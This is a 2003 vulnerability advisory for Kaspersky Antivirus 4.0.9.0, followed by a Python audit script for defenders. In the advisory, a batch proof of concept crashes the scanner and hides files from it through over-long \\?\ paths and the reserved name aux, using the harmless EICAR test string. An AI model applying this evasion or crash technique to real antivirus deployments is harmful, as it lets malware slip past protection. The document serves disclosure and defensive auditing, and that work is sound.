Kaspersky Antivirus DoS

by Nikola Strahija on February 11th, 2003

A few vulnerabilities were identified. The most serious allows a user to crash the antiviral server remotely (write access to any directory on the remote server is required).


Title: Kaspersky Antivirus DoS
Affected: Kaspersky Antivirus 4.0.9.0
(Server and Workstation version on
Windows NT 4.0 and Windows 2000).
Author: ZARAZA <[email protected]>
Vendor: Kaspersky Lab
Date: January, 30 2003
Risk: Average
Exploitable: Yes
Remote: Yes (for server versions)
Vendor Notified: January, 30 2003

I. Introduction:

Kaspersky Antivirus (KAV) is a family of antiviral products.

II. Vulnerability:

A few vulnerabilities were identified. The most serious allows a user to
crash the antiviral server remotely (write access to any directory on the
remote server is required).

1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection

III. Details:

1. Long path crash

The NTFS file system allows paths of almost unlimited length to be
created, but the Windows API does not allow paths longer than 256 bytes.
To prevent the Windows API from checking the requested path, the \\?\
prefix may be added to the filename. This is a documented feature of the
Windows API. Paths longer than 256 characters will cause the KAV monitor
service to crash or hang with 100% CPU usage. The possibility of code
execution has not been researched.

2. Long path prevents malware from detection

A long path will also prevent malware from being detected by the antiviral scanner.


3. Special name prevents malware from detection

It's possible to create an NTFS file with a name like aux.vbs or aux.com.
Malware in this file will not be detected.

IV. Exploit:

This .bat file demonstrates the vulnerability.

1,2 Long path crash & Long path prevents malware from detection

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

3. Special name prevents malware from detection

echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\aux.com


V. Vendor

No response from vendor.

--
http://www.security.nnov.ru
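
An added example, not part of the original advisory: a defender-side audit that flags files a scanner limited to plain Win32 paths may skip, for the two reasons described in section III (path length over the limit, DOS device names such as aux). It generalizes the advisory's aux case to the other reserved device names (CON, PRN, NUL, COM1-9, LPT1-9); the 256 limit is the advisory's figure, and all function names and sample paths are assumptions made for illustration.

```python
import ntpath
import os

# Limit quoted in the advisory; an assumption here, tune it to your scanner.
PATH_LIMIT = 256
EXTENDED_PREFIX = "\\\\?\\"
# DOS device names that Win32 path parsing treats specially.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{dev}{n}" for dev in ("COM", "LPT") for n in range(1, 10)
}

def strip_prefix(path):
    """Drop the extended-length prefix so lengths and names compare equally."""
    return path[len(EXTENDED_PREFIX):] if path.startswith(EXTENDED_PREFIX) else path

def reserved_components(path):
    """Return the path components whose base name is a DOS device name."""
    _, rest = ntpath.splitdrive(strip_prefix(path))
    hits = []
    for part in rest.replace("/", "\\").split("\\"):
        base = part.split(".", 1)[0].rstrip(" ").upper()
        if base in RESERVED:
            hits.append(part)
    return hits

def audit(path, limit=PATH_LIMIT):
    """List the reasons a scanner using plain Win32 paths may skip this file."""
    plain = strip_prefix(path)
    findings = []
    if len(plain) > limit:
        findings.append(f"long-path({len(plain)})")
    findings += [f"reserved-name({p})" for p in reserved_components(path)]
    return findings

def scan_tree(root):
    """Walk a real directory tree and yield (path, findings) for flagged files."""
    if os.name == "nt" and not root.startswith(EXTENDED_PREFIX):
        root = EXTENDED_PREFIX + os.path.abspath(root)  # lets os.walk descend past the limit
    for folder, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(folder, name)
            if audit(full):
                yield full, audit(full)

# Constructed sample paths (not taken from a real system).
SAMPLE_LONG = EXTENDED_PREFIX + "c:\\" + "\\".join(["A" * 200] * 7) + ".com"
SAMPLE_PATHS = [SAMPLE_LONG, "\\\\?\\c:\\aux.com", "c:\\temp\\auxiliary.txt"]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(audit(p), p[:40])
```

Run scan_tree over shares where remote users have write access and review anything it yields, since those are the files an affected on-access scanner would not have inspected.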

